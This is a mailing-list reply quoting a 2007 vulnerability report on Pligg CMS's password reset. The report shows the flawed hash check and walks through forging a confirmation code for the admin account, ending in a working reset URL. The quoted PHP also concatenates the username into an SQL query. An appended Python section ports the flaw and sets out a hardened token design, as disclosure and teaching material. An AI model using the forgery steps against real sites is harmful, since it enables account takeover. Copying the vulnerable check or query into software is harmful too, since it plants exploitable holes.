Have you notified the Pligg developers? I think they have a well-defined policy for disclosure?

On 5/25/07, 242th section <242th.section@gmail.com> wrote:
> Pligg critical vulnerability
>
> Concerned version : 9.5 and ?
>
> Description :
>
> Pligg is a flexible CMS based on PHP and MYSQL.
>
> To reinitialize a forgotten password, Pligg follows a classical
> process. A confirmation code is generated and sent by email to the
> concerned user mail box. The user has to follow the link containing
> the confirmation code and if the confirmation code is checked
> successfully, the password is reinitialized to a pre-defined value.
>
> You can find a part of the source code in charge of this check below:
>
> WEB_ROOT/libs/html1.php
>
> [...]
>
> function generateHash($plainText, $salt = null){
>     if ($salt === null) {
>         $salt = substr(md5(uniqid(rand(), true)), 0, SALT_LENGTH);
>     } else {
>         $salt = substr($salt, 0, SALT_LENGTH);
>     }
>     return $salt . sha1($salt . $plainText);
> }
>
> [...]
>
> WEB_ROOT/login.php :
>
> [...]
>
> $confirmationcode = $_GET["confirmationcode"];
> if(generateHash($username, substr($confirmationcode, 0, SALT_LENGTH)) == $confirmationcode){
>     $db->query('UPDATE `' . table_users . '` SET `user_pass` = "033700e5a7759d0663e33b18d6ca0dc2b572c20031b575750" WHERE `user_login` = "'.$username.'"');
>
> [...]
>
> Unfortunately, as you can read, you can easily generate, for a given
> username, a confirmation code that passes successfully the following
> check "if(generateHash($username, substr($confirmationcode, 0,
> SALT_LENGTH)) == $confirmationcode)"
>
> Example :
>
> Let's choose :
> salt = 123456789
>
> and,
>
> username = admin
>
> we have :
>
> sha1(123456789admin) = 1e2f566cbda0a9c855240bf21b8bae030404cad7
>
> and thus :
>
> confirmationcode = 1234567891e2f566cbda0a9c855240bf21b8bae030404cad7
>
> with the following url you can reinitialize the user admin password :
>
> http://www.domain.com/login.php?processlogin=4&username=admin&confirmationcode=1234567891e2f566cbda0a9c855240bf21b8bae030404cad7
>
> 242th.section.

-- 
---------------------------------------
http://www.secgeeks.com get a blog on SecGeeks :) register here:- http://secgeeks.com/user/register
rss feeds :- http://secradar.com/node/feed
http://www.newskicks.com Submit and kick for new stories from all around the world.
---------------------------------------
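The root cause in the quoted report is that the confirmation code is self-validating: it is built only from the username and a prefix the requester supplies, so the server never needs anything it alone knows. The following is an added example (not Pligg's code, not from the report) that ports the flawed check to Python and puts a hardened flow beside it; the SALT_LENGTH value of 9 and the store/clock interface are assumptions.

```python
import hashlib
import hmac
import os
import secrets
import time

SALT_LENGTH = 9  # assumption: matches the 9-character prefix used in the report


def generate_hash(plain_text, salt=None):
    """Port of Pligg's generateHash(): salt prefix + sha1(salt . plainText)."""
    if salt is None:
        salt = hashlib.md5(os.urandom(16)).hexdigest()[:SALT_LENGTH]
    else:
        salt = salt[:SALT_LENGTH]
    return salt + hashlib.sha1((salt + plain_text).encode()).hexdigest()


def flawed_check(username, confirmation_code):
    """login.php logic: recomputable from public data, so no secret protects it."""
    return generate_hash(username, confirmation_code[:SALT_LENGTH]) == confirmation_code


class ResetTokenStore:
    """Hardened flow: a random, single-use, expiring token stored server-side (hashed)
    and bound to one account. Nothing in the token can be derived from the username."""

    def __init__(self, ttl_seconds=3600, clock=time.time):
        self._pending = {}  # username -> (sha256 hex of token, expiry timestamp)
        self._ttl = ttl_seconds
        self._clock = clock

    def issue(self, username):
        token = secrets.token_urlsafe(32)  # only ever sent to the account's mailbox
        digest = hashlib.sha256(token.encode()).hexdigest()
        self._pending[username] = (digest, self._clock() + self._ttl)
        return token

    def verify(self, username, presented):
        entry = self._pending.get(username)
        if entry is None:
            return False
        digest, expiry = entry
        if self._clock() > expiry:
            del self._pending[username]
            return False
        if not hmac.compare_digest(digest, hashlib.sha256(presented.encode()).hexdigest()):
            return False
        del self._pending[username]  # single use: consumed on success
        return True
```

Run against the report's own salt and username, `flawed_check` accepts the value the report derives, while the store rejects it, rejects a token presented for a different account, and refuses reuse or expired tokens.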